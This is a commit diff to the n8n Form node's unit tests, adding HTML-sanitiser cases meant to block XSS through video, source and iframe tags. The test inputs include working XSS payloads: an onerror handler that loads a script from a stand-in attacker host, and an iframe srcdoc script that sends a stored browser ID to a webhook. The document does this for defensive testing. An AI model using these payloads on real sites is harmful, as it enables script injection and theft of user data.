fix(n8n Form Node): Prevent XSS with video and source tags (#16329)

packages/nodes-base/nodes/Form/test/utils.test.ts

@@ -22,7 +22,7 @@ import {
 	validateResponseModeConfiguration,
 	prepareFormFields,
 	addFormResponseDataToReturnItem,
-} from '../utils';
+} from '../utils/utils';
 
 describe('FormTrigger, parseFormDescription', () => {
 	it('should remove HTML tags and truncate to 150 characters', () => {
@@ -64,6 +64,25 @@ describe('FormTrigger, sanitizeHtml', () => {
 				html: '<input type="text" value="test">',
 				expected: '',
 			},
+			{
+				html: '<video width="640" height="360" controls><source src="https://www.w3schools.com/html/mov_bbb.mp4" type="video/mp4">Your browser does not support the video tag.</video>',
+				expected:
+					'<video width="640" height="360" controls><source src="https://www.w3schools.com/html/mov_bbb.mp4" type="video/mp4"></source>Your browser does not support the video tag.</video>',
+			},
+			{
+				html: '<video controls width="640" height="360" onclick="alert(\'XSS\')" style="border:10px solid red;"><source src="javascript:alert(\'XSS\')" type="video/mp4">Fallback text</video>',
+				expected:
+					'<video controls width="640" height="360"><source type="video/mp4"></source>Fallback text</video>',
+			},
+			{
+				html: "<video><source onerror=\"s=document.createElement('script');s.src='http://attacker.com/evil.js';document.body.appendChild(s);\">",
+				expected: '<video><source></source></video>',
+			},
+			{
+				html: "<iframe srcdoc=\"<script>fetch('https://YOURDOMAIN.app.n8n.cloud/webhook/pepe?id='+localStorage.getItem('n8n-browserId'))</script>\"></iframe>",
+				expected:
+					'<iframe referrerpolicy="strict-origin-when-cross-origin" allow="fullscreen; autoplay; encrypted-media"></iframe>',
+			},
 		];
 
 		givenHtml.forEach(({ html, expected }) => {